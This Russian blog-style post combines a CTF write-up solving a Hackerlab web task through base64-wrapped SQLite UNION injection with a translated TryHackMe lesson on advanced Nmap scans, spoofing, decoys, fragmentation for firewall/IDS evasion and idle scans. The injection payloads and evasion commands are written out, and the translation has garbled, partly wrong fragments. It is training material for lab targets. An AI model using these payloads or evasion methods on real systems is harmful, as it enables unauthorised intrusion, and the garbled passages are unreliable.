Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

Таск:

Решил, что здесь я буду писать свои посты, но до конца ещё всё не оформил

IP: 62.173.140.174:16112

Привет.

Дисклеймер!

Начнем.
==============================================================
ОТЧЁТ ПО РЕШЕНИЮ ЗАДАЧИ "ПОСТимся" — Hackerlab.pro
==============================================================

Уровень: Средний
Категория: Web / API / SQL Injection (SQLite)
Цель: http://62.173.140.174:16112/
Флаг: CODEBY{ap1_vuln_sqli_fl4g}

## 0. Условие

> Решил, что здесь я буду писать свои посты, но до конца ещё всё не оформил
> IP: 62.173.140.174:16112

Название «ПОСТимся» — каламбур: «постить» (писать посты) ↔ HTTP `POST`. Уже из условия видно, что фокус будет на POST-запросах к API, а сервис «не до конца оформлен» — намёк на халтурную фильтрацию ввода.

## Шаг 1. Первичная разведка — что за сервис

**Рассуждение.** - Что мы узнали
1. Заголовок Server: Werkzeug/3.1.5 Python/3.11.6 — это Flask-
приложение на Python 3.11. Werkzeug-сервер часто используют
как dev-сервер; в проде иногда забывают режим debug, но
/console тут (как мы увидим дальше) не открыт.

2. На странице один JS-скрипт. Он берёт значение из поля поиска,
прогоняет через btoa(unescape(encodeURIComponent(str))) — это
стандартный JS-приём, чтобы корректно закодировать UTF-8 в
base64. Затем шлёт POST /api/posts/search с телом
{"filter": "<base64>"}.

3. Это и есть наша единственная точка входа. Base64 — ВСЕГДА
кодировка, а не защита. Декодированное значение почти
гарантированно попадёт в какой-то запрос на сервере (SQL,
eval, MongoDB filter, что-то ещё), и наша задача — понять
какой и как именно.

## Шаг 2. Карта эндпоинтов

Зачем: проверить, нет ли соседних маршрутов (админка, доку-
ментация, debug-консоль Werkzeug, /api/posts/<id>, дефолтные
файлы вроде robots.txt). Делаем массовую проверку HEAD-ами
через curl с выводом только кода ответа и размера.

Флаги curl:
-s без прогресс-бара
-o /dev/null не печатать тело ответа
-w формат для вывода: код ответа и размер скачанного
--max-time таймаут 5 секунд на запрос

Из живых нашли только /api/posts и /static/style.css. Дальше
проверим разрешённые методы на /api/posts и /api/posts/search.

Также сразу проверил, можно ли создать пост (вдруг условие
буквально про "пишу свои посты"):

И посмотрел список постов:

Полный ответ:

Что узнали:

1. /api/posts/search принимает только POST.
2. /api/posts отдаёт список из трёх постов с полями id, title,
content (важно — нужно для построения UNION позже).
3. Создавать посты нельзя (POST/PUT на /api/posts → 405). "Писать
посты" в условии — это просто отсылка к глаголу "постить". (POSTing)
4. Никаких админок, debug-консолей, документации API наружу нет.

Вывод: вся поверхность атаки — единственный параметр filter в
POST /api/posts/search.

## Шаг 3. Поведение фильтра

Зачем: понять, что именно делает filter на сервере. Это поиск
по подстроке (SQL LIKE)? Точное совпадение? Регулярка? Какой-то
DSL? От ответа зависит дальнейший вектор.

Кодируем строки и шлём запросы. =

3.1. filter = "test"

echo -n "test" | base64

Вывод:

dGVzdA==

Слово "test" в заголовках постов отсутствует → пустой массив.
Ошибки нет, значит до сервера запрос дошёл корректно.

3.2. filter = "a"

echo -n "a" | base64

Вывод:

YQ==

3.3. filter = "%"

echo -n "%" | base64

Вывод:

JQ==

Вернулись все три поста. Это уже сильный сигнал: символ "%" в
LIKE-выражении SQL — это wildcard "любая последовательность
символов". Поведение совпало с SQL LIKE.

3.4. Пустое тело и пустой filter — пограничные случаи

В обоих случаях возвращаются все посты. То есть пустой фильтр
сервер сам трактует как "%" — это типично для конструкции вида
WHERE title LIKE '%' || ? || '%'.

Промежуточный вывод. На сервере, вероятнее всего, выполняется
запрос вроде:

SELECT id, title, content FROM posts WHERE title LIKE '%<filter>%'

где <filter> — декодированный base64-параметр. Если это так и
параметр подставляется конкатенацией (без параметризации) — у
нас будет SQL-инъекция.

## Шаг 4. Подтверждение SQL-инъекции и определение СУБД

Зачем: проверить, экранирует ли сервер одинарную кавычку. Если
не экранирует — мы сломаем синтаксис SQL и увидим ошибку с
характерным текстом, по которому распознаем СУБД.

4.1. Одинарная кавычка

echo -n "'" | base64

Вывод:

Jw==

Кавычка влетает в SQL "как есть" и ломает запрос. Сообщение
"unrecognized token: \"'\"" — это дословный текст ошибки SQLite
при разборе токенов. Значит:

- СУБД — SQLite.
- Кавычки не экранируются.
- Сервер ВОЗВРАЩАЕТ внутренний текст ошибки наружу (это
подарок при эксплуатации).

4.2. Дополнительная проверка — NUL-байт

Бонусный сигнал, чтобы убедиться, что строка реально доходит в
драйвер БД "сырая":

Это уже исключение SQLite ProgrammingError: SQLite не любит
NUL в строке SQL. Значит, декодированный base64 действительно
склеивается с текстом запроса.

4.3. Что мы знаем теперь

- Сервер: Flask + SQLite + что-то вроде sqlite3.execute().
- Параметризации нет (filter влетает прямо в текст запроса).
- Запрос: SELECT id, title, content FROM posts WHERE title LIKE '%<filter>%'.
- Сообщения об ошибках возвращаются в JSON как поле "error" —
это бесплатная диагностика.

## Шаг 5. UNION — определяем число колонок

Зачем: при UNION число и типы колонок в обоих SELECT должны
совпадать. Нам нужно угадать это число, чтобы прицепить свой
запрос. Из JSON ответа /api/posts мы уже видели id, title,
content — три поля. Но это полей в ответе, а количество колонок
в SELECT может отличаться. Поэтому проверим явно.

5.1. Пробуем 3 колонки

echo -n "%' UNION SELECT 1,2,3-- " | base64

Вывод:

JScgVU5JT04gU0VMRUNUIDEsMiwzLS0g

Разбор пейлоада:
%' закрываем LIKE-литерал (одинарной кавычкой)
и оставляем "%" как валидную часть
предыдущего LIKE
UNION SELECT 1,2,3 собственно UNION с тремя константами
-- (с пробелом) SQL-комментарий до конца строки, чтобы
выкинуть оставшийся хвост запроса:
...%' (и заключительную закрывающую
кавычку, и закрывающий "%")
пробел после -- обязателен в SQLite, чтобы комментарий
нормально интерпретировался

Первая запись в массиве — наша подделка: {"id":1, "title":2,
"content":3}. Значит:

- Колонок ровно 3.
- Маппинг "колонка → ключ JSON":
1-я колонка → id
2-я колонка → title
3-я колонка → content
- SQLite не ругается на смешанные типы (INTEGER в title и
content) — она динамически типизирована.

5.2. Контроль с 4 колонками

echo -n "%' UNION SELECT 1,2,3,4-- " | base64

Вывод:

JScgVU5JT04gU0VMRUNUIDEsMiwzLDQtLSA=

Запрос:

Подтверждено: левая часть UNION возвращает 3 колонки. Идеальный
канал утечки — 2-я и 3-я колонки (title, content), туда положим
данные.

## Шаг 6. Дамп схемы из `sqlite_master`

Зачем: узнать имена пользовательских таблиц и их структуру.
В SQLite есть служебная таблица sqlite_master со столбцами:

type | 'table' / 'index' / 'view' / 'trigger'
name | имя объекта
tbl_name| имя таблицы
rootpage| внутренний номер страницы
sql | оригинальный DDL (CREATE TABLE ...)

Команда генерации пейлоада:

echo -n "%' UNION SELECT 1,name,sql FROM sqlite_master-- " | base64

Вывод:

JScgVU5JT04gU0VMRUNUIDEsbmFtZSxzcWwgRlJPTSBzcWxpdGVfbWFzdGVyLS0g

(python3 -m json.tool используется только для красивого
форматирования JSON, на саму уязвимость не влияет.)

Из вывода видим три пользовательских объекта:

## ШАГ 7. ИЗВЛЕЧЕНИЕ ФЛАГА

Зачем: финальный шаг — прочитать значение колонки flag из
таблицы flag.

Команда генерации пейлоада:

echo -n "%' UNION SELECT 1,flag,flag FROM flag-- " | base64

Вывод:

JScgVU5JT04gU0VMRUNUIDEsZmxhZyxmbGFnIEZST00gZmxhZy0tIA==

Кладём значение и в title, и в content — мало ли, какое поле
сервер обрежет; на практике оба возвращаются полностью.

## ПОЧЕМУ СЕРВИС УЯЗВИМ

Реконструкция серверного кода (с высокой долей уверенности):

@app.route('/api/posts/search', methods=['POST'])
def search():
data = request.get_json()
try:
filt = base64.b64decode(data.get('filter', ''),
validate=True).decode()
except Exception:
return jsonify(success=False,
error='invalid base64 encoding')
try:
rows = db.execute(
f"SELECT id, title, content FROM posts "
f"WHERE title LIKE '%{filt}%'"
).fetchall()
except sqlite3.Error as e:
return jsonify(success=False, error=str(e))
return jsonify(success=True,
data=[dict(r) for r in rows])

Совершённые ошибки:

1. Конкатенация строк в SQL вместо параметризации. Это
фундаментальная причина уязвимости.

2. Base64 на фронте создаёт иллюзию "защиты" — но это просто
кодировка. Любой пейлоад с одинарной кавычкой и UNION легко
проходит через btoa() / base64.b64decode().

3. Сообщения об ошибках SQLite (unrecognized token, the query
contains a null character, SELECTs to the left and right of
UNION ...) уходят клиенту напрямую — это превращает blind-
эксплуатацию в обычную error-based, что заметно проще.

4. Никакой allow-list для содержимого filter не применяется.

## Готовый PoC

Сам скрипт

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

Изучите продвинутые методы, такие как сканирование с использованием нулевых адресов, FIN-сканирование, сканирование Xmas и сканирование в режиме ожидания (зомби-сканирование), подмена адресов, а также обход брандмауэров и систем обнаружения вторжений.

Task 1. Introduction

Эта комната — третья в серии уроков по Nmap (часть модуля «Введение в сетевую безопасность»). В первых двух комнатах мы изучили обнаружение хостов в режиме реального времени и базовое сканирование портов.

1. Nmap Live Host Discovery
2. Базовое сканирование портов Nmap
3. Расширенное сканирование портов Nmap
4. Nmap после сканирования портов

В разделе « Базовое сканирование портов с помощью Nmap» мы рассмотрели флаги TCP и повторили трехэтапное рукопожатие TCP . Для установления соединения TCP требует, чтобы первый пакет имел установленный флаг SYN. ​​Следовательно, мы можем определить, открыт ли порт TCP , по полученному ответу.

Исследователи безопасности и хакеры изучили флаги TCP , показанные на рисунке ниже и объясненные в предыдущем разделе, и начали экспериментировать. Они хотели узнать, что произойдет, если отправить TCP- пакет, не являющийся частью какого-либо текущего TCP- соединения, с одним или несколькими установленными флагами.

Например, флаг ACK устанавливается, когда вы хотите подтвердить получение данных. Сканирование ACK — это как попытка подтвердить данные, которые изначально не были ни отправлены, ни получены. Рассмотрим простую аналогию: кто-то внезапно подходит к вам и говорит: «Да, я вас слышу, пожалуйста, продолжайте», хотя вы ничего не сказали.

В этом разделе рассматриваются расширенные типы сканирования и параметры сканирования. Некоторые из этих типов сканирования могут быть полезны для конкретных систем, в то время как другие полезны в определенных сетевых конфигурациях. Мы рассмотрим следующие типы сканирования портов:

• Нулевое сканирование
• Сканирование FIN
• Рождественское сканирование
• Скан Маймона
• ACK Scan
• Сканирование окна
• Пользовательское сканирование

Кроме того, мы рассмотрим следующие вопросы:

• Подмена IP-адреса
• Подмена MAC-адреса
• Сканирование ложной цели
• Фрагментированные пакеты
• Сканирование в режиме ожидания/ зомби

Мы обсудим варианты и методы обхода брандмауэров и систем обнаружения вторжений . Мы также рассмотрим способы получения более подробной информации от Nmap .

Task 2. TCP Null Scan, FIN Scan, and Xmas Scan

Начнём с следующих трёх типов сканирования:

• Нулевое сканирование
• Сканирование FIN
• Рождественское сканирование

Нулевое сканирование

При сканировании без флагов никакие флаги не устанавливаются; все шесть битов флагов устанавливаются в ноль. Вы можете выбрать этот режим сканирования с помощью соответствующей -sNопции. TCP-пакет без установленных флагов не вызовет никакого ответа при достижении открытого порта, как показано на рисунке ниже. Поэтому с точки зрения Nmap отсутствие ответа при сканировании без флагов указывает на то, что либо порт открыт, либо брандмауэр блокирует пакет.

Однако мы ожидаем, что целевой сервер ответит пакетом RST, если порт закрыт. Следовательно, отсутствие ответа RST позволит нам определить, какие порты не закрыты: открыты или отфильтрованы.

Ниже приведён пример сканирования на отсутствие ответа на сервере Linux. Проведённое нами сканирование на отсутствие ответа успешно выявило шесть открытых портов в целевой системе. Поскольку сканирование на отсутствие ответа основано на предположении, что порт не закрыт, оно не может с уверенностью указывать на то, что эти порты открыты; существует вероятность того, что порты не отвечают из-за правила брандмауэра.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sN MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:30 BST
Nmap scan report for MACHINE_IP
Host is up (0.00066s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE
22/tcp  open|filtered ssh
25/tcp  open|filtered smtp
80/tcp  open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 96.50 seconds

Обратите внимание, что для многих параметров Nmap требуются права root. Если вы не запускаете Nmap от имени root, вам необходимо использовать параметр sudo, как в примере выше -sN.

Сканирование FIN

Сканирование FIN отправляет TCP-пакет с установленным флагом FIN. Вы можете выбрать этот тип сканирования с помощью соответствующей -sF опции. Аналогично, ответ не будет отправлен, если TCP- порт открыт. Опять же, Nmap не может быть уверен, открыт ли порт или же брандмауэр блокирует трафик, связанный с этим TCP- портом.

Однако целевая система должна ответить RST, если порт закрыт. Следовательно, мы сможем узнать, какие порты закрыты, и использовать эти знания для определения открытых или отфильтрованных портов. Стоит отметить, что некоторые межсетевые экраны могут «молча» отбрасывать трафик, не отправляя RST.

Ниже приведён пример сканирования FIN на сервере Linux. Результат весьма похож на результат, полученный нами ранее при использовании сканирования без проверки.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sF MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:32 BST
Nmap scan report for MACHINE_IP
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE
22/tcp  open|filtered ssh
25/tcp  open|filtered smtp
80/tcp  open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 96.52 seconds

Рождественское сканирование

Сканирование «Рождественское» получило свое название в честь рождественских гирлянд. При сканировании «Рождественское» одновременно устанавливаются флаги FIN, PSH и URG. Вы можете выбрать сканирование «Рождественское» с помощью соответствующей опции -sX.

Как и в случае с сканированием Null и сканированием FIN, получение пакета RST означает, что порт закрыт. В противном случае будет указано, что он открыт|отфильтрован.

На следующих двух рисунках показан случай, когда TCP-порт открыт, и случай, когда TCP-порт закрыт.

Приведённый ниже вывод консоли демонстрирует пример сканирования Xmas на сервере Linux. Полученные результаты довольно похожи на результаты сканирования с нулевым значением и сканирования FIN.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sX MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:34 BST
Nmap scan report for MACHINE_IP
Host is up (0.00087s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE
22/tcp  open|filtered ssh
25/tcp  open|filtered smtp
80/tcp  open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 84.85 seconds

Один из сценариев, где эти три типа сканирования могут быть эффективны, — это сканирование цели за межсетевым экраном без сохранения состояния (stateless firewall) . Межсетевой экран без сохранения состояния проверяет, установлен ли входящий пакет флаг SYN для обнаружения попытки подключения. Использование комбинации флагов, не соответствующей пакету SYN, позволяет обмануть межсетевой экран и получить доступ к системе за ним. Однако межсетевой экран с сохранением состояния практически блокирует все такие специально сформированные пакеты и делает этот тип сканирования бесполезным.

Task 3. TCP Maimon Scan

Уриэль Маймон впервые описал это сканирование в 1996 году. В этом сканировании устанавливаются биты FIN и ACK. Целевой объект должен отправить пакет RST в ответ. Однако некоторые системы, основанные на BSD, отбрасывают пакет, если это открытый порт, раскрывающий доступ к открытым портам. Это сканирование не будет работать на большинстве целей, встречающихся в современных сетях; тем не менее, мы включили его в этот раздел, чтобы лучше понять механизм сканирования портов и подход хакеров. Чтобы выбрать этот тип сканирования, используйте соответствующую -sMопцию.

Большинство целевых систем отвечают пакетом RST независимо от того, открыт ли TCP-порт. В таком случае мы не сможем обнаружить открытые порты. На рисунке ниже показано ожидаемое поведение как при открытых, так и при закрытых TCP-портах.

Приведённый ниже вывод консоли — это пример сканирования TCP-портов с помощью Maimon на сервере Linux. Как уже упоминалось, поскольку открытые и закрытые порты ведут себя одинаково, сканирование Maimon не смогло обнаружить ни одного открытого порта в целевой системе.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sM 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:36 BST
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up (0.00095s latency).
All 1000 scanned ports on ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) are closed
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds

Этот тип сканирования не является первым, который обычно выбирают для обнаружения системы; однако важно знать о нем, поскольку никогда не знаешь, когда он может пригодиться.

Task 4. TCP ACK, Window, and Custom Scan

В этом задании будет рассмотрено, как выполнить сканирование TCP ACK, сканирование TCP- окна и как создать собственное сканирование флагов.

Сканирование TCP ACK

Начнём с сканирования TCP ACK. Как следует из названия, сканирование ACK отправляет TCP- пакет с установленным флагом ACK. Используйте опцию -sA для выбора этого сканирования. Как показано на рисунке ниже, целевой сервер ответит на ACK сигналом RST независимо от состояния порта. Такое поведение обусловлено тем, что TCP-пакет с установленным флагом ACK должен отправляться только в ответ на полученный TCP-пакет для подтверждения получения данных, в отличие от нашего случая. Следовательно, в простой конфигурации это сканирование не покажет нам, открыт ли целевой порт.

В следующем примере мы просканировали целевую виртуальную машину до установки на нее брандмауэра. Как и ожидалось, нам не удалось узнать, какие порты были открыты.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sA MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:37 BST
Nmap scan report for MACHINE_IP
Host is up (0.0013s latency).
All 1000 scanned ports on MACHINE_IP are unfiltered
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.68 seconds
      

Такое сканирование было бы полезно, если перед целевым устройством установлен брандмауэр . В результате, на основе того, какие пакеты ACK привели к ответам, вы узнаете, какие порты не были заблокированы брандмауэром . Другими словами, этот тип сканирования больше подходит для обнаружения наборов правил и конфигурации брандмауэра .

После настройки целевой виртуальной машины MACHINE_IP с брандмауэром мы повторили сканирование ACK. На этот раз мы получили интересные результаты. Как видно из приведенного ниже вывода консоли, три порта не блокируются брандмауэром. Этот результат указывает на то, что брандмауэр блокирует все остальные порты, кроме этих трех.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sA MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-07 11:34 BST
Nmap scan report for MACHINE_IP
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT    STATE      SERVICE
22/tcp  unfiltered ssh
25/tcp  unfiltered smtp
80/tcp  unfiltered http
MAC Address: 02:78:C0:D0:4E:E9 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds
      

Сканирование окна

Ещё один похожий тип сканирования — сканирование TCP- окна. Сканирование TCP- окна практически идентично сканированию ACK; однако оно анализирует поле TCP- окна в возвращаемых пакетах RST. В некоторых системах это может показать, что порт открыт. Вы можете выбрать этот тип сканирования с помощью опции -sW . Как показано на рисунке ниже, мы ожидаем получить пакет RST в ответ на наши «незапрошенные» пакеты ACK, независимо от того, открыт порт или закрыт.

Аналогично, запуск сканирования TCP-окна в системе Linux без брандмауэра не даст много информации. Как видно из приведенного ниже вывода консоли, результаты сканирования окна в системе Linux без брандмауэра не предоставили никакой дополнительной информации по сравнению с ранее выполненным сканированием ACK.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sW MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:38 BST
Nmap scan report for MACHINE_IP
Host is up (0.0011s latency).
All 1000 scanned ports on ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) are closed
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds
      

Однако, как и следовало ожидать, если мы повторим сканирование TCP- окна на сервере за брандмауэром , мы рассчитываем получить более удовлетворительные результаты. В показанном ниже выводе консоли сканирование TCP- окна указало на то, что три порта обнаружены как закрытые. (Это контрастирует со сканированием ACK, которое пометило те же три порта как нефильтрованные.) Хотя мы знаем, что эти три порта не закрыты, мы понимаем, что они отреагировали по-разному, указывая на то, что брандмауэр их не блокирует.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sW MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-07 11:39 BST
Nmap scan report for MACHINE_IP
Host is up (0.00040s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
25/tcp  closed smtp
80/tcp  closed http
MAC Address: 02:78:C0:D0:4E:E9 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds
      

Пользовательское сканирование

Если вы хотите поэкспериментировать с новой комбинацией флагов TCP , выходящей за рамки встроенных типов сканирования TCP , вы можете сделать это с помощью --scanflags . Например, если вы хотите одновременно установить SYN, RST и FIN, вы можете сделать это с помощью --scanflags RSTSYNFIN . Как показано на рисунке ниже, если вы разрабатываете собственное сканирование, вам необходимо знать, как будут вести себя различные порты, чтобы правильно интерпретировать результаты в различных сценариях.

х

Наконец, важно отметить, что сканирование ACK и сканирование окна оказались очень эффективными в составлении карты правил брандмауэра . Однако необходимо помнить, что если брандмауэр не блокирует определенный порт, это не обязательно означает, что служба прослушивает этот порт. Например, возможно, правила брандмауэра необходимо обновить, чтобы отразить недавние изменения в работе служб. Следовательно, сканирование ACK и сканирование окна выявляют правила брандмауэра , а не службы.

Task 5. Spoofing and Decoys

В некоторых сетевых конфигурациях вы можете сканировать целевую систему, используя поддельный IP-адрес и даже поддельный MAC-адрес. Такое сканирование полезно только в том случае, если вы можете гарантировать получение ответа. Если вы попытаетесь сканировать целевую систему из случайной сети, используя поддельный IP-адрес, скорее всего, вы не получите никакого ответа, и результаты сканирования могут быть ненадежными.

На следующем рисунке показано, как злоумышленник запускает команду nmap -S SPOOFED_IP MACHINE_IP. В результате Nmap сформирует все пакеты, используя предоставленный исходный IP-адрес SPOOFED_IP. Целевая машина будет отвечать на входящие пакеты, отправляя ответы на целевой IP-адрес SPOOFED_IP. Для того чтобы сканирование работало и давало точные результаты, злоумышленнику необходимо отслеживать сетевой трафик для анализа ответов.

Вкратце, сканирование с использованием поддельного IP-адреса состоит из трех шагов:

1. Злоумышленник отправляет пакет с поддельным IP-адресом отправителя на целевой компьютер.
2. Целевой компьютер отвечает, указывая в качестве адреса назначения поддельный IP-адрес.
3. Злоумышленник перехватывает ответы, чтобы определить открытые порты.

Как правило, предполагается указать сетевой интерфейс с помощью команды -e`ping` и явно отключить сканирование ping -Pn. Поэтому вместо ` nmap -S SPOOFED_IP MACHINE_IPping` вам потребуется использовать команду `ping` nmap -e NET_INTERFACE -Pn -S SPOOFED_IP MACHINE_IP, чтобы явно указать Nmap , какой сетевой интерфейс использовать, и не ожидать ответа на ping. Стоит повторить, что это сканирование будет бесполезно, если система злоумышленника не сможет отслеживать сеть на предмет ответов.

Находясь в той же подсети, что и целевой компьютер, вы также сможете подменить свой MAC-адрес. Вы можете указать исходный MAC-адрес с помощью команды `make - --spoof-mac SPOOFED_MAC...

Подмена IP-адресов работает лишь в минимальном количестве случаев, когда выполняются определенные условия. Поэтому злоумышленник может прибегнуть к использованию поддельных IP-адресов, чтобы затруднить обнаружение. Концепция проста: сканирование должно выглядеть так, будто оно исходит со множества IP-адресов, чтобы IP-адрес злоумышленника затерялся среди них. Как показано на рисунке ниже, сканирование целевой машины будет выглядеть так, будто оно исходит из 3 разных источников, и, следовательно, ответы будут поступать и в поддельные IP-адреса.

Вы можете запустить сканирование с использованием ложных целей, указав конкретный или случайный IP-адрес после команды -D`.`. Например, команда ` nmap -D 10.10.0.1,10.10.0.2,ME MACHINE_IP.` заставит сканирование MACHINE_IP выглядеть так, будто оно исходит с IP-адресов 10.10.0.1, 10.10.0.2, а затем MEкоманда `.` укажет, что ваш IP-адрес должен быть третьим в списке. Другой пример команды `.` — `.` nmap -D 10.10.0.1,10.10.0.2,RND,RND,ME MACHINE_IP, где третий и четвертый исходные IP-адреса назначаются случайным образом, а пятым источником будет IP-адрес злоумышленника. Другими словами, при каждом выполнении последней команды вы ожидаете, что в качестве третьего и четвертого источников ложных целей будут использоваться два новых случайных IP-адреса.

Task 6. Fragmented Packets

Брандмауэр

Брандмауэр — это программное или аппаратное устройство, которое разрешает прохождение пакетов или блокирует их. Он работает на основе правил брандмауэра , которые можно кратко описать как блокировку всего трафика с исключениями или разрешение всего трафика с исключениями. Например, вы можете заблокировать весь трафик к вашему серверу, кроме того, который поступает на ваш веб-сервер. Традиционный брандмауэр проверяет, как минимум, заголовок IP-адреса и заголовок транспортного уровня. Более сложный брандмауэр также попытается проверить данные, передаваемые транспортным уровнем.

ИРС

Система обнаружения вторжений ( IDS ) проверяет сетевые пакеты на наличие определенных поведенческих шаблонов или специфических сигнатур содержимого. Она выдает предупреждение всякий раз, когда обнаруживается вредоносное правило. В дополнение к заголовку IP и заголовку транспортного уровня, IDS проверяет содержимое данных на транспортном уровне и проверяет, соответствует ли оно каким-либо вредоносным шаблонам. Как можно снизить вероятность обнаружения вашей активности Nmap традиционным межсетевым экраном / IDS ? На этот вопрос нелегко ответить; однако, в зависимости от типа межсетевого экрана / IDS , может быть полезно разделить пакет на более мелкие пакеты.

Фрагментированные пакеты

Nmap предоставляет возможность -fфрагментации пакетов. После выбора этой опции IP-данные будут разделены на фрагменты размером не более 8 байт. Добавление еще одного параметра -f( -f -fили -ff) разделит данные на фрагменты по 16 байт вместо 8. Вы можете изменить значение по умолчанию, используя параметр --mtu; однако всегда следует выбирать значение, кратное 8.

Для правильного понимания фрагментации нам необходимо взглянуть на заголовок IP-пакета на рисунке ниже. На первый взгляд он может показаться сложным, но мы видим, что большинство его полей нам известны. В частности, обратите внимание на адрес источника, занимающий 32 бита (4 байта) в четвертой строке, а адрес назначения — еще 4 байта в пятой строке. Данные, которые мы будем фрагментировать на несколько пакетов, выделены красным цветом. Для облегчения сборки на стороне получателя IP использует идентификатор (ID) и смещение фрагмента, показанные во второй строке рисунка ниже.

Давайте сравним выполнение команд `np` sudo nmap -sS -p80 10.20.30.144и ` sudo nmap -sS -p80 -f 10.20.30.144np`. Как вы уже знаете, в первом случае будет использоваться скрытое сканирование TCP SYN на порту 80; однако во второй команде мы запрашиваем у Nmap фрагментацию IP-пакетов.

В первых двух строках мы видим ARP-запрос и ответ. Nmap отправил ARP-запрос, поскольку целевой объект находится в том же Ethernet-соединении. Вторые две строки показывают TCP SYN-пинг и ответ. Пятая строка — это начало сканирования портов; Nmap отправляет TCP SYN-пакет на порт 80. В этом случае заголовок IP составляет 20 байт, а заголовок TCP — 24 байта. Обратите внимание, что минимальный размер заголовка TCP составляет 20 байт.

При фрагментации, запрошенной через параметр `--fragment` -f, 24 байта заголовка TCP будут разделены на фрагменты, кратные 8 байтам, при этом последний фрагмент будет содержать не более 8 байтов заголовка TCP . Поскольку 24 делится на 8, мы получаем 3 фрагмента IP; каждый из них содержит 20 байтов заголовка IP и 8 байтов заголовка TCP . Три фрагмента можно увидеть между пятой и седьмой строками.

Обратите внимание, что если вы добавите -ff(или -f -f), фрагментация данных будет кратна 16. Другими словами, 24 байта заголовка TCP в этом случае будут разделены на два фрагмента IP: первый будет содержать 16 байтов, а второй — 8 байтов заголовка TCP.

С другой стороны, если вы предпочитаете увеличить размер пакетов, чтобы они выглядели безобидными, вы можете использовать опцию --data-length NUM, где num указывает количество байтов, которые вы хотите добавить к вашим пакетам.

Task 7. Idle/Zombie Scan

Подмена исходного IP-адреса может быть отличным способом скрытого сканирования. Однако подмена работает только в определенных сетевых конфигурациях. Она требует наличия возможности отслеживать трафик. Учитывая эти ограничения, подмена IP-адреса может быть малоэффективна; однако мы можем улучшить этот метод с помощью сканирования в режиме ожидания.

Для сканирования в режиме ожидания, или сканирования «зомби» , требуется система, находящаяся в режиме ожидания и подключенная к сети, с которой вы можете взаимодействовать. На практике Nmap будет создавать видимость каждого зондирующего запроса от хоста в режиме ожидания ( зомби ), а затем проверять, получил ли хост в режиме ожидания ( зомби ) какой-либо ответ на поддельный запрос. Это достигается путем проверки значения IP-идентификатора (IP ID) в заголовке IP. Вы можете запустить сканирование в режиме ожидания, используя команду `npm run src` nmap -sI ZOMBIE_IP MACHINE_IP, где ZOMBIE_IP`npm run src` — это IP-адрес хоста в режиме ожидания ( зомби ).

Для проверки доступности (на наличие « зомби-памяти ») порта необходимо выполнить следующие три шага:

1. Чтобы записать текущий IP-адрес неактивного хоста, необходимо активировать ответ на этом хосте.
2. Отправьте SYN-пакет на TCP- порт целевого устройства. Пакет должен быть подделан таким образом, чтобы создавалось впечатление, будто он отправлен с IP-адреса неактивного хоста ( зомби-сервера ).
3. Повторно запустите неактивный компьютер, чтобы он ответил, и вы могли сравнить новый IP-адрес с тем, который был получен ранее.

Давайте объясним на рисунках. На рисунке ниже показана система злоумышленника, которая проверяет неактивный компьютер — многофункциональный принтер. Отправив SYN/ACK, она отвечает пакетом RST, содержащим её вновь увеличенный IP-адрес.

Злоумышленник отправит SYN-пакет на TCP- порт, который он хочет проверить на целевой машине на следующем шаге. Однако этот пакет будет использовать IP-адрес неактивного хоста ( зомби- хоста ) в качестве источника. Могут возникнуть три сценария. В первом сценарии, показанном на рисунке ниже, TCP- порт закрыт; следовательно, целевая машина отвечает неактивному хосту пакетом RST. Неактивный хост не отвечает; следовательно, его IP-адрес не увеличивается.

Во втором сценарии, как показано ниже, TCP- порт открыт, поэтому целевая машина отвечает SYN/ACK неактивному хосту ( зомби- хосту ). Неактивный хост отвечает на этот неожиданный пакет пакетом RST, тем самым увеличивая свой IP-адрес.

